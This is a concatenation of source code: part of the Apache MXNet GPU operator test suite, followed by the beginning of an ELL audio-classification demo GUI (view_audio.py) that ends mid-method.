grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
def check_rnn_layer(layer):
layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
@pytest.mark.serial
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
@pytest.mark.serial
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
@pytest.mark.serial
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
@with_seed()
@pytest.mark.serial
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% gurantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'):
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'):
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), {'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
@pytest.mark.serial
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
pytest.raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
@with_seed()
@pytest.mark.serial
@pytest.mark.serial
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] is 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
if req_dict['grid'] is 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym._bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : str(seg_sizes[0]),
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : str(seg_sizes[1]),
'MXNET_EXEC_BULK_EXEC_TRAIN' : str(seg_sizes[2])},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
@pytest.mark.serial
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z._simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
|
view_audio.py
|
#!/usr/bin/env python3
###################################################################################################
##
## Project: Embedded Learning Library (ELL)
## File: view_audio.py
## Authors: Chris Lovett, Chuck Jacobs
##
## Requires: Python 3.x
##
###################################################################################################
import argparse
import json
import math
import os
import time
from threading import Thread, Lock, get_ident
import sys
import wave
import tkinter as tk
from tkinter import BOTH, LEFT, RIGHT, TOP, BOTTOM, RAISED, X, N, END
from tkinter import Text
from tkinter.ttk import Frame, LabelFrame, Button, Style, Label, Entry
import numpy as np
import matplotlib
# Embedding matplotlib plots in tkinter views requires using the "TkAgg" backend
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import matplotlib.pyplot as pyplot
import matplotlib.animation as animation
# local modules
import classifier
import featurizer
import microphone
import speaker
import wav_reader
class AudioDemo(Frame):
""" A demo application class that provides simple GUI for testing featurizer+classifier on
microphone or wav file input. """
def __init__(self, featurizer_model=None, classifier_model=None,
sample_rate=None, channels=None, input_device=None, categories=None,
image_width=80, ignore_label=None, threshold=None, wav_file=None, clear=5):
""" Initialize AudioDemo object
featurizer_model - the path to the compiled ELL featurizer
classifier_model - the path to the compiled ELL classifier
sample_rate - sample rate to featurizer is expecting
channels - number of channels featurizer is expecting
input_device - optional id of microphone to use
categories - path to file containing category labels
image_width - width of the spectrogram image
ignore_label - list of predictions to ignore (e.g. [0] ignores prediction 0)
threshold - ignore predictions that have confidence below this number (e.g. 0.5)
wav_file - optional wav_file to process when you click Play
"""
input_device
super().__init__()
self.CLASSIFIER_MODEL_KEY = "classifier_model"
self.FEATURIZER_MODEL_KEY = "featurizer_model"
self.WAV_FILE_KEY = "wav_file"
self.CATEGORY_FILE_KEY = "categories"
self.get_settings_file_name()
self.load_settings()
self.reading_input = False
self.featurizer_model = None
if featurizer_model:
self.featurizer_model = featurizer_model
self.settings[self.FEATURIZER_MODEL_KEY] = featurizer_model
elif self.FEATURIZER_MODEL_KEY in self.settings:
self.featurizer_model = self.settings[self.FEATURIZER_MODEL_KEY]
self.classifier_model = None
if classifier_model:
self.classifier_model = classifier_model
self.settings[self.CLASSIFIER_MODEL_KEY] = classifier_model
elif self.CLASSIFIER_MODEL_KEY in self.settings:
self.classifier_model = self.settings[self.CLASSIFIER_MODEL_KEY]
self.wav_filename = wav_file
if self.wav_filename is None and self.WAV_FILE_KEY in self.settings:
self.wav_filename = self.settings[self.WAV_FILE_KEY]
self.wav_file_list = None
self.sample_rate = sample_rate if sample_rate is not None else 16000
self.channels = channels if channels is not None else 1
self.input_device = input_device
self.num_classifier_features = None
if not categories and self.CATEGORY_FILE_KEY in self.settings:
categories = self.settings[self.CATEGORY_FILE_KEY]
self.categories = categories
if categories:
self.settings[self.CATEGORY_FILE_KEY] = categories
self.save_settings() # in case we just changed it.
self.min_value = 0.0
self.max_value = 1.0
self.update_minmax = True
self.ignore_list = []
if ignore_label:
self.ignore_list = [ ignore_label ]
self.threshold = threshold
self.output_clear_time = int(clear * 1000) if clear else 5000
self.featurizer = None
self.classifier = None
self.wav_file = None
self.speaker = None
self.microphone = None
self.animation = None
self.show_spectrogram = True
self.colormap_name = "plasma"
self.show_classifier_output = True
self.last_prediction = None
self.probability = 0
# Threads
self.read_input_thread = None
self.lock = Lock()
self.main_thread = get_ident()
self.message_queue = []
# UI components
self.max_spectrogram_width = image_width
self.features_entry = None
self.spectrogram_image = None
self.classifier_feature_data = None
self.spectrogram_image_data = None
self.init_ui()
if self.featurizer_model:
self.load_featurizer_model(os.path.abspath(self.featurizer_model))
else:
self.show_output("Please specify and load a feature model")
if self.classifier_model:
self.load_classifier(self.classifier_model)
self.setup_spectrogram_image()
else:
self.show_output("Please specify and load a classifier model")
def get_settings_file_name(self):
""" this app stores the various UI field values in a settings file in your temp folder
so you don't always have to specify the full command line options """
import tempfile
temp = tempfile.gettempdir()
self.settings_file_name = os.path.join(temp, "ELL", "Audio", "viewaudio.json")
def load_settings(self):
""" load the previously saved settings from disk, if any """
self.settings = {}
if os.path.isfile(self.settings_file_name):
with open(self.settings_file_name, "r") as f:
self.settings = json.load(f)
def save_settings(self):
""" save the current settings to disk """
settings_dir = os.path.dirname(self.settings_file_name)
if not os.path.isdir(settings_dir):
os.makedirs(settings_dir)
with open(self.settings_file_name, "w") as f:
f.write(json.dumps(self.settings))
def load_featurizer_model(self, featurizer_model):
""" load the given compiled ELL featurizer for use in processing subsequent audio input """
if featurizer_model:
self.featurizer = featurizer.AudioTransform(featurizer_model, 40)
